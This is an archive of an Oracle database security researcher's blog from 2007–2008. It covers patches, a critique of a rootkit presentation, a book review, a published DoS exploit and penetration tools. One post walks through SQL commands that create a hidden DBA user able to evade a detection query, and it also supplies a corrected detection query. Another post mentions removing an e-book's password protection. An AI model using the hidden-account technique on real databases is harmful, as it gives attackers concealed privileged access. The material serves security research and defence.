Oracle Patchset 10.2.0.4 is out

25 Feb 2008 von Alexander Kornbrust.

I just read in Sven’s Blog that the Oracle Patchset 10.2.0.4 is out. Patch 6810189 is available for Linux x86.

10.2.0.4 comes with new security fixes for VPD (Bypass VPD), Auditing (Some activities are not audited) and other security bugs. These bugs will be fixed in future CPUs in older versions.

Soon we wil report from our first experience with 10.2.0.4.

Geschrieben in 10.2.0.4, Allgemein | Keine Kommentare »

Are Oracle Rootkits easy to find?

24 Dez 2007 von Alexander Kornbrust.

Few days ago David Litchfield published his presentation “In-memory Backdoors“. It’s an interesting presentation with a new idea and a proof-of-concept code of a 3rd generation memory rootkit for Oracle. Last year I predicted 3rd generation rootkits for databases.

 

But here some additional comments and corrections to his presentation.

 

David claimed that he released information about “Manipulating Views” in January 2005 in the book “Database Hackers Handbook”. This is not correct. The “Database Hackers Handbook” was released in July 2005 not January 2005. Just a difference of 6 month…. and after my black hat  2005 presentation in April 2005. Even if David sent this information to his publisher 6 month in advance,  I sent my blackhat presentation about rootkits to the Black Hat organizer in December 2004…

 

And the “Database Hackers Handbook” contains only 1 reference to manipulated views in chapter 2.

“(If you know a bit about Oracle and are wondering why I’m not using the DBA_USERS and DBA_ROLE_PRIVS views, see the last chapter in the Oracle section—you can’t trust views.) This is enough on users and roles at the moment. Let’s look at how database users are authenticated.“

==> BTW the select statement “select name,password from sys.user$ where type#=1;” is not correct. The correct statement to get all users is “select name,password from sys.user$ where type#<>1;“

 

I was not able to find this information because the last  Oracle chapter (chapter 5) does not contain the word “view”. But I am quite sure that David can post the page where this information is written in the book.

 

But now back to the content of the presentation and David’s ideas.

 

According to David 1.gen rootkits are easy to find, but 1.Gen rootkits have also some advantages. The advantage of the object (view, synonyms, …) modification concept is that this concept is platform independent. David’s memory rootkit are working on Windows only (so far) and most customers do not use Oracle on Windows for important databases.

–

 

David claims that xstatus is essentially the same as the modification of a view. This is not correct. It’s a different idea with the same result. I think that the concept of updating data for manipulation reasons is more powerful than manipulating objects and much more difficult to find. 

 

3 days ago I talked with Pete about this issue and I showed Pete how to create invisible users without getting caught by David’s SQL statement (” SELECT NAME FROM SYS.USER$ WHERE TYPE# =1 MINUS SELECT USERNAME FROM SYS.DBA_USERS“). 

 

Here is the way how to do it… 

 

————- tests performed on 10.2.0.3 with Oct 2007 CPU ——————–

– We create aN user called U1 (user#=76 on my system) with DBA privileges

SQL> create user u1 identified by u1;

SQL> grant dba to u1;

—

SQL> select user#, name, datats# from sys.user$;

         0 SYS                                     0

         1 PUBLIC                                  0

        76 U1                                      5

…

 

– Now we modify the result of the table as mentioned by David in his presentation

SQL> update sys.user$ set datats#=31337 where user#=76;

 

1 row updated.

 

SQL> commit;

 

Commit complete.

 

– The user is no longer visible in dba_users

– Now we compare the base table sys.user$ with the view dba_users and we get the difference between sys.user$ and dba_users (as mentioned in the presentation)

SQL> SELECT NAME FROM SYS.USER$ WHERE TYPE# =1 MINUS SELECT USERNAME FROM SYS.DBA_USERS;

 

U1

 

 

– But does the statement really work in all cases? No!

 

– Why only updating 1 column, let’s change type# too

– type#<0 are not working (if the database was restarted)

–

SQL> update sys.user$ set type#=2 where user#=76;

 

1 row updated.

 

SQL> commit;

 

Commit complete.

 

– Now we run the query to get invisible user from David (”Current rootkits trivial to spot”)

– But the query misses this trivial change ;-). 

– But it’s not a shame. My former SQL statements to check for hidden users

– were also wrong. Also Pete’s, Laszlo, … statement to get users from sys.user$ are only partially correct 

SQL> SELECT NAME FROM SYS.USER$ WHERE TYPE# =1 MINUS SELECT USERNAME FROM SYS.DBA_USERS;

 

no rows selected

————-

 

– It is important to restart the database 

– but the connect u1/u1 still works

SQL> conn u1/u1

 

– To get invisible users you should use type#!=0

SQL> SELECT NAME FROM SYS.USER$ WHERE TYPE# !=0 MINUS SELECT USERNAME FROM SYS.DBA_USERS;

 

U1

 

–

 

I think the concept of modifying data to change results is underestimated and really powerful and much more difficult to find (checksums are normally not possible). I have already some interesting ideas in mind…

 

 

The in-memory rootkit is a good work from David.

 

 

Geschrieben in rootkits, David Litchfield, Oracle Security, Allgemein | Keine Kommentare »

Review “Practical Oracle Security”

26 Nov 2007 von Alexander Kornbrust.

Today I downloaded a new Oracle Security book from Syngress: “Practical Oracle Security“. Here a short review:

Downloading the ebook was quick and easy. The annoying thing was the password query every time I opened the ebook. To get rid of the password I opened the PDF file in Adobe Acrobat, removed the password protection and that’s it… Syngress forgot to protect the PDF file properly.

First I skimmed through the book and it looks quite nice in the beginning but then I found more and more problems and inaccuracies. Some of the recommendations from the book make your database even more insecure.

Here an incomplete list of some potential problems and inaccuracies:

p. 43: Some older versions of dbms_system.ksdwrt are vulnerable against a buffer overflow. This could cause a database crash. This is not mentioned. Playing around with dbms_system.ksdwrt could crash your database.

p.58: Providing read access (711) to the listener.ora is not a good idea because this file contains the password hash of the TNS listener.

p.74: Recommendation to set a long and strong listener password in 10g. This makes the listener configuration more insecure because it opens remote administration if the password is known!!! The combination password and local os authentication is in my opinion not useful. I would recommend to use local OS authentication alone OR set a strong password together with disabling local OS authentication.

p.108: Using impossible passwords introduces a security risk because all versions until 10g R.2 are resetting a default password from time to time. Unlocking databases accounts introduces a big security hole because a default account gets a default password. Problem is reported to Oracle but still unfixed.

p. 139: Important and powerful packages like utl_inaddr (send sensitive data via DNS) or dbms_advisor (write files to OS) are not mentioned in the ebook

p.139: Description of execute any procedure is wrong. Exploits are only working if the o7_dictionary is set to non-default value

p.140: Description of select any table is wrong.

p.170: … if a 0day exploit exists on the internet, Oracle will generally release a security alert rather than waiting for the next scheduled CPU. This is not true (see for example exploit dbms_export_extension or create view problem). Oracle will only release out-of-order patches if an exploit is available on the internet AND the bug is critical AND will be exploited

p.180: Recommends to enable account lockout. This is a conflict with the impossible and unlocked database accounts. Account lockout could also lead to a D.o.S. against application user accounts (e.g. used in AppServer)

p. 209: Blank Oracle passwords? Tell us more…

p.210: How can you read a file with utl_file only? Without directory traversal (fixed in all supported patchsets) and without “create any directory”?

p. 211: The famous blank password again…

p.232: utl_udp is not an oracle package. It’s a package posted on USENET.

p.232: Packages such as utl_file. utl_http, … give access to the host’s operating system including the file system and network. ==> this is not correct.

Geschrieben in Security Book, Oracle Security, Oracle, Allgemein | 2 Kommentare »

D.o.S. Exploit for Oracle 10.2.0.1/10.2.0.2 published on bugtraq

3 Nov 2007 von Alexander Kornbrust.

Yesterday an anonymous person (oraclefun@hushmail.com) posted an exploit for XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10.2 on the security mailing list bugtraq without any explanation about affected versions. I did a few tests and tested this exploit against my test databases. Unpatched Oracle 10.2.0.1 and 10.2.0.2 databases are terminated immediately.

This exploit is using IDS evasion techniques to avoid detection from network based IDS for Oracle.

To run this exploit only the privilege “create session” is required. 10.2.0.3 is not affected from this exploit.

Oracle 9i Rel. 1, 9i Rel. 2, 10g Rel.1 and 11g are not affected and throw error messages.

######### 9.2.0.8 , 10.1.0.5 #########
ERROR at line 22:
ORA-06550: line 22, column 1:
PLS-00201: identifier ‘XDB.XDB_PITRIG_PKG’ must be declared
ORA-06550: line 22, column 1:
PL/SQL: Statement ignored
#########

######### 10.2.0.3 or 11g #########
ERROR at line 1:
ORA-29329: Table not of type XMLType
ORA-06512: at “XDB.XDB_PITRIG_PKG”, line 127
ORA-06512: at line 22
#########

Geschrieben in Exploit, Oracle Security, Allgemein | Keine Kommentare »

Joxean Koret released a whitepaper about Oracle Database Vault: Design Failures

29 Okt 2007 von Alexander Kornbrust.

Joxean Koret just released a whitepaper about Design Failures in Oracle Database Vault.

Joxean describes Oracle Database Vault (DBV) in his paper as “war against DBAs” and explains various ways to bypass DBV on OS / file system level (e.g. trojanized oci library, backup, rootkits, …). Joxean is also talking about is the ancient problem “Quis custodiet ipsos custodes” (”Who will guard the guardians” or “Who controls the police”). The solution for this problem is always the concept of segregation of duties (3 accounts instead of the powerful DBA). It’s clear that the current version of DBV has still many bugs (there are many open bugs from various companies unfixed).

I think this whitepaper shows a common misunderstanding of the product DBV itself. DBV was never designed to protect against attacks on OS/Filesystem level (e.g. it’s possible to disable DBV on OS level for applying patches). It’s just a framework to build more secure database systems together with other products like TDE, ASO, … together with a good architecture (apps, auditing, backup, …)

Geschrieben in Database Vault, Oracle Security, Allgemein | Keine Kommentare »

Inguma - Free Oracle Penetration Toolkit from Joxean Koret

20 Okt 2007 von Alexander Kornbrust.

Joxean Koret released version 0.05 of his free penetration toolkit called Inguma. This tool is also implementing an exploit for one of the bugs (LT.FINDRICSET) fixed in the October 2007 CPU.

The name Inguma is coming from the basque god of dreams who kills people while sleeping and, also, the one who make the nightmares.

Inguma, written in Phython, supports different systems (e.g. Oracle, SQL Server, SSH, Firewalls). The following features are Oracle specific:

* Added one exploit for the vulnerability in SYS.LT.FINDRICSET (Oracle CPU Oct. 2007).
* Added module “bruteora” to brute force Oracle servers. It will check
for every (commonly) possible user or for an specified user.
* Added a tool to crack MD5 hashes using freely available rainbow tables.
* Added module “sidguess” to guess the SID of an Oracle Database instance.
* Added a password cracker for Oracle11g.
* Enhanced the Oracle PL/SQL Fuzzer. Now, if you redirect the output
only the vulnerabilities found are logged, all the rest of the output
are written to stderr.

Here a screenshot from the tool on my Backtrack 2 system:

Well done Joxean.

Geschrieben in Inguma, software, Oracle Security, Allgemein | Keine Kommentare »

GOSS - GUI Oracle scanner

14 Okt 2007 von Alexander Kornbrust.

From time to time I’m doing research on Russian websites (with Google Translate) because you can find interesting information and tools. Last week I found a small program Oracle scanner called goss a GUI Oracle Scanner.

This tools contains features like getting the SID (similar to sidguess), password guessing, retrieve password hashes from the database, …

The output is displayed in a new window.

Some of the features in this tool where not working properly against my test databases.

Geschrieben in software, Security, Oracle Security, Allgemein | Keine Kommentare »

Partnership between Red-Database-Security GmbH and PeteFinnigan.com Ltd.

21 Aug 2007 von Alexander Kornbrust.

Red-Database-Security GmbH in Germany and PeteFinnigan.com Limited in the UK are pleased to announce an exclusive partnership to promote and sell services / training and products to give customers the best choices in securing Oracle databases. Pete Finnigan and Alex Kornbrust are both world leaders in the field of securing Oracle databases and this exclusive partnership will provide a stronger combined proposition for customers of both companies. Alex and Pete are pleased to announce an exclusive and exciting limited opportunity to attend a 5 day Oracle Anti Hacker training in London from October 29th to November 2nd. The places are limited so don’t miss this unique opportunity. See www.petefinnigan.com and www.red-database-security.com for more details and to register.”

Geschrieben in Trainings, Security, Oracle Security, Allgemein | 2 Kommentare »

Aaron Newman criticize Oracle patch policies

24 Mai 2007 von Alexander Kornbrust.

The interview “Security guru blasts Oracle’s patching policies” with Aaron Newman from Application Security Inc. descibes the problems with patching Oracle databases (long time to patch, backports, …).

Geschrieben in Allgemein | Keine Kommentare »

Oracle Security Blog

23 Mai 2007 von Alexander Kornbrust.

Welcome to our new Oracle Security Blog!

We will post information about Oracle Security.

Geschrieben in Allgemein | Keine Kommentare »